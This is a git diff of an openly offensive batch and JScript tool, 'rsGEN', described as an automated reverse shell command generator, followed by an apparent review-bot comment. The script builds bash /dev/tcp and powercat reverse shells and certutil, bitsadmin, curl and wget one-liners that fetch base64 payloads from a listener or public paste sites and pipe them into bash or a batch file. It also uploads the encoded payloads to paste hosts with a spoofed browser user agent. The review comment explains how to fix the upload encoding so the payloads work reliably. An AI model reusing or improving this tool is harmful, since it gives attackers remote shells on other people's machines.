/transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, +) else ( + if "!rs_webport!" equ "80" ( + set rs_webport_display= + ) else ( + set "rs_webport_display=:%rs_webport%" + ) + call :rs_info_w7windows_start + echo powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('http://!rs_listen_host!!rs_webport_display!/pcat.ps1'^);pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd + echo, + echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat + echo, + echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat + echo, + echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat + echo, + + call :rs_info_w7linux_start + echo curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo wget -qO- http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + + call :rs_info_wlinux7_start + echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, +) +goto :eof +:rs_command_lan_end + +:rs_command_generate_pub_outpub_windowsw10_start +if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat +echo, +if "!rs_dpaste_status!"=="0" echo  certutil -urlcache -split 
-f !rs_dpaste_url!.txt cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module bitstransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"^|cd.bat +echo, +goto :eof +:rs_command_generate_pub_outpub_windowsw10_end + +:rs_command_generate_pub_outpub_linuxw10_start +if "!rs_pastebin_status!"=="0" echo  curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo  curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo  wget -qO- !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo  wget -qO- !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +goto :eof +:rs_command_generate_pub_outpub_linuxw10_end + +:rs_command_generate_pub_outpub_wl10_start +if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo  certutil -urlcache -split -f !rs_dpaste_url!.txt cd.bat^|cd.bat^|^|curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module BitsTransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +goto :eof +:rs_command_generate_pub_outpub_wl10_end + +:rs_command_generate_pub_outpub_windowsw7_start +if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat +echo, +if "!rs_dpaste_status!"=="0" echo certutil -urlcache -split -f !rs_dpaste_url!.txt cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo 
powershell "Import-Module bitstransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"^|cd.bat +echo, +goto :eof +:rs_command_generate_pub_outpub_windowsw7_end + +:rs_command_generate_pub_outpub_linuxw7_start +if "!rs_pastebin_status!"=="0" echo curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo wget -qO- !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo wget -qO- !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +goto :eof +:rs_command_generate_pub_outpub_linuxw7_end + +:rs_command_generate_pub_outpub_wl7_start +if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo certutil -urlcache -split -f !rs_dpaste_url!.txt cd.bat^|cd.bat^|^|curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat^|^|curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo "powershell "Import-Module BitsTransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash" +echo, +goto :eof +:rs_command_generate_pub_outpub_wl7_end + +::"transfer command" generation +:rs_command_generate_pub_start +set rs_listen_host= +set rs_listen_port= +set rs_listen_host=%1 +set rs_listen_port=%2 +set "rs_ps_command_pre=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " +set "ps_command_suf_raw=IEX (New-Object System.Net.Webclient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd" +set "linux_command_raw=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1" +call :rs_base64_encode_start "!linux_command_raw!" 
+set rs_linux_command_b64=%rsgen_b64_res% +::echo %rs_linux_command_b64% +powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('%ps_command_suf_raw%'))|out-file -Encoding ascii %temp%\rs_temp_input.rsg" +set /p rs_ps_command_suf_b64=<%temp%\rs_temp_input.rsg +::echo %rs_ps_command_suf_b64% +set "rs_command_b64=!rs_linux_command_b64!!rs_ps_command_pre!!rs_ps_command_suf_b64!" +::echo !rs_command_b64!>%temp%\rs_command_b64.rsg +call :rs_command_upload_start +if "!rs_pastebin_status!"=="-1" ( + if "!rs_dpaste_status!"=="-1" ( + echo, + powershell -c write-host "' Command upload failed, make sure you can access the internet, check local proxy settings, or make sure the pastebin API is available'" -f red 2>nul + goto rs_help_start + ) +) +goto :eof +:rs_command_generate_pub_end + +::Upload command to pastebin +:rs_command_upload_start +echo * Uploading command to pastebin... +set "url=http://p.ip.fi/" +set "urlfilepath=%temp%\rs_temp_input.rsg" +set "ipfilepath=%temp%\rs_temp_output.rsg" +if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg +call :rs_http_post_start "%url%" "paste=!rs_command_b64!" "%urlfilepath%" "%rs_listen_host%" "%ipfilepath%" +if exist "%temp%\rs_temp_input.rsg" ( + echo + Upload command to pastebin Success. + set rs_pastebin_status=0 + set /p rs_pastebin_url=<%temp%\rs_temp_input.rsg +) else ( + set rs_pastebin_status=-1 + powershell -c write-host "' - Upload command to pastebin Failed!'" -f red 2>nul +) +set "url=http://dpaste.com/api/v2/" +set "urlfilepath=%temp%\rs_temp_input.rsg" +set "ipfilepath=%temp%\rs_temp_output.rsg" +if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg +call :rs_http_post_start "%url%" "content=!rs_command_b64!" "%urlfilepath%" "%rs_listen_host%" "%ipfilepath%" +if exist "%temp%\rs_temp_input.rsg" ( + echo + Upload command to dpaste Success. 
+ set rs_dpaste_status=0 + set /p rs_dpaste_url=<%temp%\rs_temp_input.rsg +) else ( + set rs_dpaste_status=-1 + powershell -c write-host "' - Upload command to dpaste Failed!'" -f red 2>nul +) +goto :eof +:rs_command_upload_end + +::Embedded js code to achieve command upload function +:rs_http_post_start +cscript //E:JScript //nologo "%~f0" "%~nx0" %* +goto :eof +@if (@rsgen) == (@RSGEN) @end *****/ +var args = WScript.Arguments; +var xhr = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); +var AdoDBObj = new ActiveXObject("ADODB.Stream"); +if (args.Length == 6 ) { + url = args.Item(1) + data = args.Item(2).replace("+", "%2B").replace("&", "%26"); + filename = args.Item(3) + ip = args.Item(4) + ipfilename = args.Item(5) + request(url); + writeFile(ipfilename,ip2dec(ip)); + WScript.Quit(666); +} +if (args.Length == 4 ) { + url = args.Item(1) + data = args.Item(2).replace("+", "%2B").replace("&", "%26"); + filename = args.Item(3) + request(url); + WScript.Quit(666); +} +if (args.Length == 3 ) { + ip = args.Item(1) + ipfilename = args.Item(2) + writeFile(ipfilename,ip2dec(ip)); + WScript.Quit(666); +} +if (args.Length == 1 ) { + WScript.Quit(-1); +} +function request(url) { + var RESOLVE_TIMEOUT = 50000; + var CONNECT_TIMEOUT = 10000; + var SEND_TIMEOUT = 10000; + var RECEIVE_TIMEOUT = 10000; + xhr.open('POST', url, false); + xhr.Option(4) = 13056; + xhr.SetRequestHeader("User-Agent", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3"); + xhr.SetRequestHeader("Referer", "http://www.google.com/") + xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded") + xhr.SetRequestHeader("Connection", "Close") + xhr.SetTimeouts(RESOLVE_TIMEOUT, CONNECT_TIMEOUT, SEND_TIMEOUT, RECEIVE_TIMEOUT); + try { + xhr.send(data); + xhr.WaitForResponse; + //WScript.Echo(xhr.responseText); + } catch(e) { + WScript.Quit(-1); + } + writeFile(filename,xhr.responseText); +} +function 
writeFile(fileName, data) { + AdoDBObj.Type = 2; + AdoDBObj.CharSet = "iso-8859-1"; + AdoDBObj.Open(); + AdoDBObj.Position = 0; + AdoDBObj.WriteText(data); + AdoDBObj.SaveToFile(fileName, 2); + AdoDBObj.Close(); +} +function ip2dec(ip) { + var ipreg = /^(\d{0,3}\.){3}.(\d{0,3})$|^(\d{0,3}\.){5}.(\d{0,3})$/; + var valid = ipreg.test(ip); + if (!valid) { + return false; + } + var dots = ip.split('.'); + for (var i = 0; i < dots.length; i++) { + var dot = dots[i]; + if (dot > 255 || dot < 0) { + return false; + } + } + if (dots.length == 4) { + return ((((((+dots[0])*256)+(+dots[1]))*256)+(+dots[2]))*256)+(+dots[3]); + } else { + return false; + } +} +@if (@rsgen) == (@RSGEN) @end /***** JS +:rs_http_post_end + +::banner +:rs_banner_w7_start +echo ______ ________ ____ _____ +echo .' ___ ^|^|_ __ ^|^|_ \^|_ _^| +echo _ .--. .--. / .' \_^| ^| ^|_ \_^| ^| \ ^| ^| +echo [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| +echo ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ +echo [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.0 +echo, +goto :eof +:rs_banner_w7_end + +:rs_banner_w10_start +echo  ______ ________ ____ _____ +echo  .' ___ ^|^|_ __ ^|^|_ \^|_ _^|  +echo  _ .--. .--. / .' 
\_^| ^| ^|_ \_^| ^| \ ^| ^| +echo  [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| +echo  ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ +echo  [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.0 +echo, +goto :eof +:rs_banner_w10_end + +:rs_info_w10windows_start +echo  Windows Command  +echo, +goto :eof +:rs_info_w10windows_end + +:rs_info_w7windows_start +powershell -c write-host "' Windows Command'" -f yellow 2>nul +echo, +goto :eof +:rs_info_w7windows_end + +:rs_info_w10linux_start +echo  Linux Command +echo, +goto :eof +:rs_info_w10linux_end + +:rs_info_w7linux_start +powershell -c write-host "' Linux Command'" -f yellow 2>nul +echo, +goto :eof +:rs_info_w7linux_end + +:rs_info_wlinux10_start +echo  Windows^&Linux +echo, +goto :eof +:rs_info_wlinux10_end + +:rs_info_wlinux7_start +powershell -c write-host "' Windows&Linux'" -f yellow 2>nul +echo, +goto :eof +:rs_info_wlinux7_end + +::help info +:rs_help_start +echo, +echo This is an automated Reverse Shell Command Genrator. +echo, +echo Usage: %~nx0 host port [options] +echo Options: +echo -pub If the target can access the public network, use it. +echo -lan If the target cannot access the public network, use it. +echo -listen If you need to listen the port, use it. +echo -ngrok Start ngrok TCP Tunnel(Contains -pub, -listen options). +echo -pgrok Start a TCP Tunnel(like ngrok but free and unlimited). +echo, +echo Examples: %~nx0 8.8.8.8 8888 +echo %~nx0 8.8.8.8 8888 -pub +echo %~nx0 192.168.31.216 8888 -lan +echo %~nx0 192.168.31.216 8888 -listen +echo %~nx0 192.168.31.216 8888 -lan -listen +echo %~nx0 8888 -ngrok +echo %~nx0 8888 -pgrok +exit /b 0 +:rs_help_end +@if (@rsgen) == (@RSGEN) @end JS *****/ \ No newline at end of file diff --git a/runcmd.bat b/runcmd.bat new file mode 100644 index 0000000..52483ba --- /dev/null +++ b/runcmd.bat @@ -0,0 +1 @@ +@cmd /k cd %cd%\ \ No newline at end of file
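Review bot: The pastebin upload in the embedded JScript mangles any payload that contains more than one `+`, because `String.replace` with a string pattern substitutes only the first occurrence: `data = args.Item(2).replace("+", "%2B").replace("&", "%26");` leaves every later `+` in the base64 body unencoded, a form-urlencoded parser turns those into spaces, and the text served back from `!rs_pastebin_url!.txt` will then no longer round-trip through `base64 -d` (the Linux part is certutil base64 and the PowerShell part is UTF-16 base64, so several `+` per payload is likely). Use global regexes instead, `data = args.Item(2).replace(/\+/g, "%2B").replace(/&/g, "%26").replace(/ /g, "%20");` (the `%20` covers the literal spaces in the `&powershell -EP Bypass …` segment, which are also sent raw; the leading `paste=` / `content=` key is untouched because `=` is not rewritten). Separately, every generated one-liner fetches the command over plain HTTP from a public paste host and pipes it straight into `bash` or `cd.bat` with no integrity check, so the `-pub` help text in `:rs_help_start` should say that this path publicly discloses the listener address and fully trusts the paste host and the network path. The `:rs_http_post_start` label and the JScript block it invokes are both inside this hunk.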